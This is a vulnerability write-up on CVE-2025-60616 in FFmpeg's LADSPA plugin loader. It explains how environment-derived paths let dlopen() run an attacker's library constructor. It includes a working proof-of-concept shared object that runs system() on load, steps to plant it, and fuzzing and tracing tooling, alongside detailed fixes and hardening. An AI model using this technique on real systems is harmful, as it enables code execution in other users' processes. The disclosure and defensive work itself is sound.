Key Takeaways

- Environment variables are an important, often-forgotten part of any application’s attack surface: blindly trusting environment variables such as PATH, HOME, and LADSPA_PATH can introduce serious security issues. As this post demonstrates, unvalidated HOME and LADSPA_PATH values let dlopen() load attacker-controlled .so files, and run their constructors, before symbol validation occurred.

- Heavy fuzzing ≠ full coverage: OSS-Fuzz excels at codec paths, but environment-driven resolution logic is rarely exercised. The same holds for most automated fuzzing, regardless of target or fuzzer. Targeting those vectors directly exposed this high-impact execution window.

- Verify before you load: canonicalize and allowlist plugin directories; isolate dlopen() inside a forked verifier process so constructors run in the child process rather than inside the main service.

Exploiting the Sound of Trust (CVE-2025-60616)

I like to think of vulnerability hunting as an odd mix of archaeology, improvisation, and stubborn curiosity. You comb through code that other researchers have already examined, bring fresh perspectives, discard old, tired assumptions, and poke at the seams until something gives. In FFmpeg’s LADSPA plugin loader I found one of those seams: a tiny design pattern that trusts environment-derived paths and hands them to dlopen(), which yields an immediate execution window. This post walks through what I found, why it matters, how I found it despite heavy fuzzing of the project, and how to fix it with a principled, computer-science-driven methodology. Expect deep technical detail, runnable snippets, and conceptual diagrams illustrating the exploitation window and the safer “verifier” pattern I used as a patch sketch.

Opening the hood: why plugin loaders are an attack surface

The Linux Audio Developer’s Simple Plugin API (LADSPA) is simple by design: it is a C application programming interface (API) for audio plugins, used by many applications, and an integral part of the Linux audio landscape. FFmpeg’s af_ladspa.c, which uses the LADSPA API, builds paths to candidate .so files from environment variables such as LADSPA_PATH and HOME, then attempts to dlopen() those candidates until it finds a module exporting ladspa_descriptor. That pattern keeps things convenient for users, but it also creates a classic trust boundary: environment values and home-directory paths are often writable or influenceable by unprivileged users, CI systems, container images, or wrapper scripts. This is further complicated by the order in which an application resolves environment variables from program, user, and system scopes (program, user, then system; user, system, then program; system, user, then program; or program, system, then user), which differs by language and operating system when the developer cannot or does not specify the source.

Executable and Linkable Format (ELF) shared objects are special in that they can run code the moment they are loaded into a process, via constructors listed in .init_array or .init. Because dlopen() asks the dynamic loader to map and initialize the object, and because those constructors execute before any runtime symbol checks, calling dlopen() on a path you haven’t canonicalized and validated hands an attacker a guaranteed execution window inside your process.
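To make the constructor mechanism concrete, here is a minimal sketch assuming an ELF target with GCC or Clang on Linux; the names are illustrative. Instead of __attribute__((constructor)), which modern ELF toolchains typically compile into an .init_array entry, it places a function pointer in .init_array directly. The loader calls every entry in that section during initialization (before main() in an executable, or before dlopen() returns for a shared object) without consulting any symbol the host might look up later.

```c
/* Illustrative flag, set by code the loader runs during initialization. */
static volatile int init_entry_ran = 0;

static void mark_initialized(void)
{
    init_entry_ran = 1;          /* a malicious object could do anything here */
}

/* A raw .init_array entry: the loader calls every pointer in this section at load time.
 * "used" stops the compiler from discarding the otherwise unreferenced variable. */
__attribute__((used, section(".init_array")))
static void (*init_entry)(void) = mark_initialized;

/* Returns 1 if the entry above has already run. */
int init_entry_has_run(void)
{
    return init_entry_ran;
}
```

Called from main(), init_entry_has_run() returns 1 because the entry ran before main() started; the same code compiled into a .so would run inside the host’s dlopen() call.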

This is not a parser crash or a heap overflow — it is a logic and trust problem: the loader is asking the system to execute code on its behalf before verifying that the code conforms to the expected plugin interface.

The vulnerable pattern distilled

Below is the essence of the vulnerable flow, expressed as a small pseudo-snippet. Imagine that directories derived from getenv("LADSPA_PATH") and getenv("HOME") are concatenated with the plugin name to form candidate, after which dlopen() is called on that attacker-controlled value.

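```c
/* Simplified search loop: each directory comes from LADSPA_PATH or $HOME. */
for (size_t i = 0; i < ndirs; i++) {
    const char *path = dirs[i];
    snprintf(candidate, sizeof(candidate), "%s/%s.so", path, plugin_name);
    void *handle = dlopen(candidate, RTLD_NOW);       /* constructors run here */
    if (!handle)
        continue;                                     /* try the next directory */
    void *sym = dlsym(handle, "ladspa_descriptor");   /* checked only after constructors ran */
    /* ... use sym ... */
}
```

The fatal assumption is that dlsym() is sufficient to validate the object. It is not: constructors run during dlopen(), before dlsym() is ever reached, so we must never dlopen() attacker-controlled files in the main process.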
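The sketch below is a hypothetical helper, not FFmpeg’s verbatim code. It builds the candidate list in the order this post describes: each LADSPA_PATH entry, then $HOME/.ladspa, then the system directories (FFmpeg’s exact directory list and order may differ). It performs no dlopen() at all; it only shows that whoever controls the two environment variables controls the first strings that would reach dlopen().

```c
#define _XOPEN_SOURCE 700          /* for strtok_r() */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CAND_LEN 4096              /* illustrative buffer size */

/* Hypothetical helper: fills out[] with up to `max` candidate paths and returns the count.
 * Only the last two (system) entries are outside user control. */
size_t build_candidates(const char *ladspa_path, const char *home, const char *name,
                        char out[][CAND_LEN], size_t max)
{
    static const char *const system_dirs[] = { "/usr/lib/ladspa", "/usr/local/lib/ladspa" };
    size_t n = 0;

    if (ladspa_path) {
        char buf[CAND_LEN];
        snprintf(buf, sizeof buf, "%s", ladspa_path);   /* strtok_r() modifies its input */
        char *save = NULL;
        for (char *dir = strtok_r(buf, ":", &save); dir && n < max;
             dir = strtok_r(NULL, ":", &save))
            snprintf(out[n++], CAND_LEN, "%s/%s.so", dir, name);   /* no validation at all */
    }
    if (home && n < max)
        snprintf(out[n++], CAND_LEN, "%s/.ladspa/%s.so", home, name);
    for (size_t i = 0; i < 2 && n < max; i++)
        snprintf(out[n++], CAND_LEN, "%s/%s.so", system_dirs[i], name);
    return n;
}
```

With LADSPA_PATH=/tmp/ladspa, the very first candidate is /tmp/ladspa/NAME.so, so an attacker who can set that variable never has to compete with the system directories.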

Proof of concept: constructor PoC

To demonstrate the point, I used a minimal shared object with a constructor that writes a file. The constructor is an explicit, visible side effect that can’t be undone when dlsym() later fails to find the plugin symbol, because the code has already run as part of the loading process. The code looks like this:

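```c
#include <stdio.h>   /* fprintf */
#include <stdlib.h>  /* system */
#include <unistd.h>  /* getpid */

/* Runs when the dynamic loader initializes the object, i.e. inside dlopen(). */
__attribute__((constructor))
static void init(void) {
    fprintf(stderr, "[*] Evil LADSPA plugin loaded! PID=%d\n", (int)getpid());
    system("echo pwned > /tmp/ladspa_poc");
}
```

Build it with gcc -fPIC -shared -o evil.so evil.c, place it in a directory the loader searches, such as $HOME/.ladspa or a directory listed in LADSPA_PATH (the run below used /tmp/ladspa), and invoke the LADSPA filter. The loader prints the constructor message, and /tmp/ladspa_poc contains pwned even though dlsym() later reports that ladspa_descriptor is missing: the constructor has already executed.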

Output:

```text
--snip--
Input #0, lavfi, from 'sine=frequency=1000:duration=1':
  Duration: N/A, start: 0.000000, bitrate: 705 kb/s
  Stream #0:0: Audio: pcm_s16le, 44100 Hz, mono, s16, 705 kb/s
[*] Evil LADSPA plugin loaded! PID=1393717
[Parsed_ladspa_0 @ 0xaaaacb6d34e0] Could not find ladspa_descriptor: /tmp/ladspa/evil.so: undefined symbol: ladspa_descriptor
```

Code execution:

```text
cat /tmp/ladspa_poc
pwned
```

Explanation:

The outputs above, first from ffmpeg and then from the file that the “malicious” interface created, underscore the problem: dlopen() executes code before the interface is validated.

This example shows the danger precisely: the __attribute__((constructor)) function in the “malicious” interface executes when dlopen() maps the object into the process, so the constructor’s side effects (in our sample, the stderr message and the system() call that creates /tmp/ladspa_poc) occur before the loader calls dlsym() to check for ladspa_descriptor. The output and the file’s contents prove this order of operations: the constructor’s fprintf() printed to stderr before dlsym() performed its check for ladspa_descriptor, and /tmp/ladspa_poc was created and filled with attacker-controlled data, demonstrating that interface validation happened too late to prevent the side effect.
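To reproduce the ordering without FFmpeg, a tiny host program is enough. The probe_plugin() function below is a hypothetical stand-in for the loader that performs the same two steps, dlopen() and then dlsym() for ladspa_descriptor. It assumes Linux with glibc; on glibc older than 2.34, link with -ldl.

```c
#include <dlfcn.h>
#include <stdio.h>

/* Hypothetical stand-in for the loader: dlopen() first, dlsym() second.
 * Returns -1 if dlopen() fails, 1 if ladspa_descriptor is missing, 0 if it is present. */
int probe_plugin(const char *path)
{
    void *handle = dlopen(path, RTLD_NOW | RTLD_LOCAL);
    if (!handle) {
        fprintf(stderr, "dlopen failed: %s\n", dlerror());
        return -1;
    }
    /* Any constructor in `path` has already run in this process by now. */
    dlerror();                                        /* clear stale error state */
    void *sym = dlsym(handle, "ladspa_descriptor");
    const char *err = dlerror();
    if (err)
        fprintf(stderr, "Could not find ladspa_descriptor: %s\n", err);
    dlclose(handle);
    return (err || !sym) ? 1 : 0;
}
```

Called from a small main() as probe_plugin("./evil.so"), it should print the constructor’s message first and the missing-symbol error second, mirroring the ffmpeg output, because the constructor ran inside dlopen().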

How I found it despite heavy prior fuzzing

FFmpeg is a mature target for OSS-Fuzz and many independent research groups, so more brute-force codec fuzzing was unlikely to surface a meaningful logic bug in the loader code. Instead, my approach leaned on hypothesis and isolation rather than blind, unguided fuzzing, concentrating attention on a narrow code path without requiring a large fuzzing effort.

I started with a static scan of the FFmpeg tree for dlopen, getenv, and LADSPA, and quickly zeroed in on libavfilter/af_ladspa.c. Working in my integrated development environment (IDE), I tested directly against the real FFmpeg binary: I mutated LADSPA_PATH and HOME with long segments, “..” sequences, symlinks, and injected NULs via controlled execve calls, and ran ffmpeg under ASan/UBSan and strace to observe the exact candidate filenames passed to dlopen().

Heavy OSS-Fuzz efforts typically target decoding logic and widely exercised APIs. Path resolvers and environment-driven logic are smaller code paths that are often hit only under specific environment permutations, so general fuzzing campaigns frequently miss them. By exercising those permutations directly, I was able to make dlopen() open attacker-controlled files and execute their code, reaching paths that blindly applied fuzzers rarely, if ever, target.

Fuzzing and triage: a compact workflow

To exercise the resolver safely, I mutated LADSPA_PATH and HOME directly and ran the real ffmpeg binary under sanitizers and syscall tracing rather than building an isolated harness. In practice, I iterated through attacks and permutations in my IDE: generate or script environment permutations (long path segments, many components, “..” sequences, symlink layouts, and injected NULs via controlled execve calls), export each permutation, and invoke an ASan/UBSan-instrumented ffmpeg build. I used strace -f -e trace=open,openat,execve to see the exact candidate filenames the loader built and attempted to open, then reviewed the sanitizer output for string and heap issues in the path-building code.
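The environment permutations can be driven from a small C harness that controls exactly what the target sees. run_with_env() below is a hypothetical helper, not part of FFmpeg: it forks, passes an environment containing only the mutated LADSPA_PATH and HOME, and returns the child’s exit status. Two caveats: the fixed buffer sizes are arbitrary, and because execve() passes C strings, an injected NUL simply truncates the value the child receives.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical harness helper: runs `prog` with an environment that contains only the
 * mutated LADSPA_PATH and HOME values. Returns the exit status, or -1 on error/signal. */
int run_with_env(const char *prog, char *const argv[], const char *ladspa_path, const char *home)
{
    char ladspa_var[8192], home_var[8192];     /* arbitrary sizes for this sketch */
    int a = snprintf(ladspa_var, sizeof ladspa_var, "LADSPA_PATH=%s", ladspa_path);
    int b = snprintf(home_var, sizeof home_var, "HOME=%s", home);
    if (a < 0 || b < 0 || (size_t)a >= sizeof ladspa_var || (size_t)b >= sizeof home_var)
        return -1;                             /* refuse to silently truncate a test value */
    char *const envp[] = { ladspa_var, home_var, NULL };

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(prog, argv, envp);              /* returns only on failure */
        _exit(127);
    }
    int status;
    while (waitpid(pid, &status, 0) < 0)
        if (errno != EINTR)
            return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

To combine it with syscall tracing, prog and argv can point at strace with -f -e trace=open,openat,execve followed by the ffmpeg command line; use absolute paths throughout, since this environment deliberately omits PATH.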

When triaging a suspicious run, I looked for three signal types. First, constructor side effects (stderr prints or created files, such as /tmp/ladspa_poc in the example) that appeared before dlsym() reported a missing symbol indicated that dlopen() had executed the object. Second, ASan/UBSan traces pointing at path concatenation or buffer handling helped identify root-cause string bugs. Third, strace logs showing open/openat calls on unexpected locations revealed the exact attacker-controlled candidate path. You can also use other tools, such as LD_PRELOAD-based instrumentation that intercepts and logs dlopen/dlsym calls, but be aware that LD_PRELOAD changes the runtime environment and may alter the triggering conditions.
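A minimal sketch of the LD_PRELOAD approach, assuming Linux with glibc: the shim defines its own dlopen(), logs the requested path to stderr, and forwards to the real implementation found with dlsym(RTLD_NEXT, ...). It covers dlopen() only; the file name and the dlopen_call_count() helper are hypothetical. Because preloading changes the runtime environment, confirm any finding without the shim.

```c
#define _GNU_SOURCE                 /* for RTLD_NEXT */
#include <dlfcn.h>
#include <stdio.h>

/* Hypothetical LD_PRELOAD shim (e.g. dlopen_log.c):
 *   gcc -shared -fPIC -o dlopen_log.so dlopen_log.c    (add -ldl on glibc < 2.34)
 *   LD_PRELOAD=./dlopen_log.so ffmpeg ...
 * The lazy lookup below is racy if threads call dlopen() concurrently; fine for triage. */
static unsigned long dlopen_calls = 0;

void *dlopen(const char *filename, int flags)
{
    static void *(*real_dlopen)(const char *, int) = NULL;
    if (!real_dlopen)
        real_dlopen = (void *(*)(const char *, int))dlsym(RTLD_NEXT, "dlopen");
    dlopen_calls++;
    fprintf(stderr, "[dlopen-log] %s (flags=0x%x)\n",
            filename ? filename : "(null)", (unsigned)flags);
    return real_dlopen ? real_dlopen(filename, flags) : NULL;
}

/* Number of dlopen() calls seen so far (useful when the shim is linked into a test). */
unsigned long dlopen_call_count(void)
{
    return dlopen_calls;
}
```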

This approach keeps the test authoritative by using the real binary, maximizing fidelity to production behavior, while producing deterministic artifacts for reproduction: the mutated environment values that triggered the event, the strace path list, and the sanitizer trace or constructor side effect used as proof of concept.

The correct fix: don’t dlopen() untrusted files in the main process

There are three complementary defenses that together remove the exploitation window. First, canonicalize candidate paths using realpath() and enforce an allowlist of system plugin directories such as /usr/lib/ladspa and /usr/local/lib/ladspa. Second, avoid dlopen()ing files in the primary process that you haven’t verified. The safest pattern I used is to fork a short-lived verifier process that dlopen()s the candidate and checks for the required ladspa_descriptor symbol; constructors, if any, will run in the child only, isolating side effects. If the verifier exits successfully, the main process may choose to dlopen() the verified object or prefer loading it in a more controlled fashion. Third, for higher assurance, provide signed plugin registries or manifests so production deployments can reject untrusted uploads.
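The canonicalize-and-allowlist step might look like the following sketch. path_in_allowlist() is a hypothetical helper that assumes allowlist entries are themselves canonical absolute paths without a trailing slash. The two details that matter are checking realpath()’s return value and matching on a directory boundary, so that /usr/lib/ladspa-evil is not accepted as if it were inside /usr/lib/ladspa.

```c
#define _XOPEN_SOURCE 700           /* for realpath() */
#include <limits.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: true only if `candidate` resolves (symlinks, ".", ".." removed)
 * to a path strictly inside one of `dirs`. The canonical result is left in `resolved`. */
bool path_in_allowlist(const char *candidate, const char *const *dirs, size_t ndirs,
                       char resolved[PATH_MAX])
{
    if (!realpath(candidate, resolved))     /* fails on missing files, ELOOP, ENAMETOOLONG, ... */
        return false;
    for (size_t i = 0; i < ndirs; i++) {
        size_t len = strlen(dirs[i]);
        /* Require a '/' right after the prefix so "/usr/lib/ladspa-evil" does not match. */
        if (strncmp(resolved, dirs[i], len) == 0 && resolved[len] == '/')
            return true;
    }
    return false;
}
```

Callers should then load the resolved path rather than the original string, so the allowlist decision and the load refer to the same name.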

A sketch of the verifier pattern looks like this: the parent forks, the child attempts dlopen() and dlsym() on the candidate and exits with status “0” on success and non-zero on failure. The parent waits and only proceeds if the child returned success. This pattern preserves the ability to validate plugin shape while preventing constructors from running in the service process.
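The verifier sketch described above could look like this in C; the signature, with the required symbol passed as a parameter, is an assumption for illustration. Two caveats apply. Constructors run in the child, so a malicious object can also forge the child’s exit status, which means success only says the shape check passed. And after fork() in a multithreaded process only async-signal-safe functions are safe to call, so a production version would more likely fork() and exec() a dedicated helper binary than call dlopen() directly in the child.

```c
#define _XOPEN_SOURCE 700
#include <dlfcn.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Sketch of the fork-verifier (hypothetical signature).
 * Returns 1 if a short-lived child could dlopen() `path` and resolve `symbol`, else 0.
 * Constructors in `path` execute only in the child process. */
int verify_candidate(const char *path, const char *symbol)
{
    pid_t pid = fork();
    if (pid < 0)
        return 0;                           /* cannot verify: fail closed */
    if (pid == 0) {
        void *handle = dlopen(path, RTLD_NOW | RTLD_LOCAL);
        int ok = handle != NULL && dlsym(handle, symbol) != NULL;
        _exit(ok ? 0 : 1);                  /* _exit(): skip inherited atexit handlers and stdio buffers */
    }
    int status;
    while (waitpid(pid, &status, 0) < 0)
        if (errno != EINTR)
            return 0;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}
```

In the loader, this would be called as verify_candidate(resolved, "ladspa_descriptor") after the allowlist check.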

Patch sketch and practical considerations



Figure 1: dlopen() loads a shared object, runs its constructors, and only then returns a handle — meaning attacker code can execute before any symbol checks.

A minimal patch path is to replace direct dlopen(candidate) calls with canonicalization using realpath(), allowlist checks, and then a call to verify_candidate(), which forks and performs the dlopen()/dlsym() checks in the child. If the child exits cleanly, load the verified plugin in a controlled manner. Keep error handling tight, test with ASan/UBSan, and add unit tests that simulate attacker-controlled plugin directories. Remember that realpath() fails on non-existent files, so always check its result rather than assuming it canonicalized an arbitrary string. It is also important to note that a time-of-check to time-of-use (TOCTOU) race condition can result if the file isn’t locked during this entire process, and such vulnerabilities have been used extensively in the past as a means of privilege escalation.
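One way to narrow that TOCTOU window, sketched here as a Linux-specific assumption rather than a complete fix, is to check the file through an open descriptor and then load that same descriptor via /proc/self/fd, so swapping the path name between check and load no longer matters. open_trusted_plugin() is hypothetical, and O_NOFOLLOW only protects the final path component, so the directories above the file still need to be trustworthy.

```c
#define _XOPEN_SOURCE 700           /* for O_NOFOLLOW and O_CLOEXEC */
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical, Linux-specific helper. Opens the already-canonicalized path, checks the
 * opened file itself (not the name), and writes "/proc/self/fd/N" into fd_path so a later
 * dlopen() maps the same inode that was checked. Returns the descriptor, or -1. */
int open_trusted_plugin(const char *resolved, char *fd_path, size_t fd_path_len)
{
    int fd = open(resolved, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != 0 ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);                          /* not a root-owned, non-group/world-writable file */
        return -1;
    }
    int n = snprintf(fd_path, fd_path_len, "/proc/self/fd/%d", fd);
    if (n < 0 || (size_t)n >= fd_path_len) {
        close(fd);
        return -1;
    }
    return fd;
}
```

After a successful call, passing fd_path to dlopen() (in the verifier child, which inherits the descriptor across fork(), or in the parent) opens the same inode that fstat() inspected; keep the descriptor open until the load completes.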

Figure 2: The arrows flow upward to show that the verifier’s exit status returns to the main process. The child process executes dlopen() in isolation, and only its exit code flows back to the parent for the trust decision.

While the fork-verifier pattern prevents direct constructor execution in the main process, it does not address all classes of plugin risks. Consider also signing plugins, adding capability drops after verification, and removing user-level plugin scanning from production builds.

Detection and operational hardening

Operators should audit systemd units, wrapper scripts, and container entry points for exported LADSPA_PATH values or insecure HOME mounts. Hardening includes removing world-writable permissions from plugin directories, enforcing file integrity checks, and monitoring writes to plugin directories. On the monitoring side, strace-style collection or auditd rules that log open/openat calls on plugin directories can help detect suspicious loads. When accepting plugin uploads in web interfaces, validate the artifacts and move them into trusted directories using a controlled service that enforces ownership and permissions.
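Removing world-writable permissions only helps if every directory on the way to the plugin is protected too, because write access to any ancestor lets an attacker swap out a subdirectory. The hypothetical audit helper below is a sketch that assumes plugins should live under root-owned directories: it canonicalizes a directory and walks up to / checking ownership and write bits at each level.

```c
#define _XOPEN_SOURCE 700           /* for realpath() */
#include <limits.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

/* Hypothetical audit helper: true only if `dir` and every ancestor up to "/" is a
 * root-owned directory that is neither group- nor world-writable. */
bool ancestors_trusted(const char *dir)
{
    char buf[PATH_MAX];
    if (!realpath(dir, buf))            /* resolve symlinks and ".." first */
        return false;
    for (;;) {
        struct stat st;
        if (stat(buf, &st) != 0 || !S_ISDIR(st.st_mode) || st.st_uid != 0 ||
            (st.st_mode & (S_IWGRP | S_IWOTH)))
            return false;
        if (strcmp(buf, "/") == 0)
            return true;                /* reached the root: every level passed */
        char *slash = strrchr(buf, '/');
        if (slash == buf)
            slash[1] = '\0';            /* parent of "/usr" is "/" */
        else
            *slash = '\0';              /* drop the last component */
    }
}
```

Running it over each configured plugin directory at service start-up, and refusing to scan any directory that fails, is one way to turn the permission advice above into an enforced check.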

Closing thoughts

This vulnerability class is deceptively simple and doesn't rely on exotic memory corruption primitives. Instead, it exploits the predictable semantics of ELF and dynamic loading combined with an unjustified trust of environment-derived paths. The remediation is straightforward once you accept a core principle: do not execute untrusted code in your primary process. Isolate, canonicalize, verify, and only then load. For researchers, the lesson is also clear: heavy fuzzing reduces a large class of bugs, but hypothesis-led, focused testing of auxiliary logic — resolvers, loaders, environment parsing — will reveal different, high-impact issues that wide-coverage fuzzing can miss.